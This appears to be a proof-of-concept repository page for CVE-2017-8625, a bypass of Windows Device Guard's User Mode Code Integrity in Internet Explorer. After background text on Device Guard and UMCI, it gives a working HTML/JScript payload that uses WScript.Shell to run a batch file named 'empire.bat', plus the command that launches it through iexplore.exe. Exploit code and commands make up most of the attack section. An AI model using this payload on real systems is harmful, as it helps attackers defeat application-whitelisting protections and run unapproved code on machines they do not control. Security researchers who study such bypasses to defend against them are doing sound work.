
CVE-2017-8625 PoC — Microsoft Windows Internet Explorer security vulnerability

Source
Associated Vulnerability
Title: Microsoft Windows Internet Explorer security vulnerability (CVE-2017-8625)
Description: Microsoft Windows 10 and Windows Server 2016 are products of the US company Microsoft; the former is an operating system for personal computers and the latter is a server operating system. Internet Explorer (IE) is a web browser bundled with the Windows operating system. IE 11 in Microsoft Windows contains a security feature bypass vulnerability, which stems from the program not validating the UMCI policy. An attacker can exploit this vulnerability to bypass the Device Guard User Mode Code Integrity (UMCI) policy. The following ver
Description
Bypass of the UMCI feature in Internet Explorer
Readme
# What is Windows Defender Device Guard?
Windows Defender Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications that you define in your code integrity policies. If the app isn’t trusted it can’t run, period. With hardware that meets basic requirements, it also means that even if an attacker manages to get control of the Windows kernel, he or she will be much less likely to be able to run malicious executable code. With appropriate hardware, Windows Defender Device Guard can use the new virtualization-based security in Windows 10 (available in Enterprise and Education desktop SKUs and in all Server SKUs) to isolate the Code Integrity service from the Microsoft Windows kernel itself. In this case, the Code Integrity service runs alongside the kernel in a Windows hypervisor-protected container.
This guide explores the individual features in Windows Defender Device Guard as well as how to plan for, configure, and deploy them. It includes:


## What is UMCI?

UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going
 
======================================================================||>

## Bypassing UMCI in Internet Explorer with JScript


#### The bypass code

======================================================================||>

```html
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>
```



======================================================================||>

```powershell
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
```


## Modified JScript code
![screenshot from 2017-08-25 11-55-12](https://user-images.githubusercontent.com/25440152/29715018-7d585292-8973-11e7-8126-f2e946dbb52f.png)
======================================================================||>


##### Running the bypass
![screenshot from 2017-08-25 11-56-01](https://user-images.githubusercontent.com/25440152/29715057-a762c5c2-8973-11e7-84b7-ca7a68b96cf8.png)
======================================================================||>


# Explanation by
[@Matt Homjxi0e](https://twitter.com/GihadAlkmaty)
-----
# Original bypass by
[@enigma0x3](https://twitter.com/enigma0x3)
-----
File Snapshot

```text
[4.0K] /data/pocs/953baf7091cd15a5a6f0bf4f456ca32818e66859
├── [ 150] Bypass.html
└── [2.7K] README.md

0 directories, 2 files
```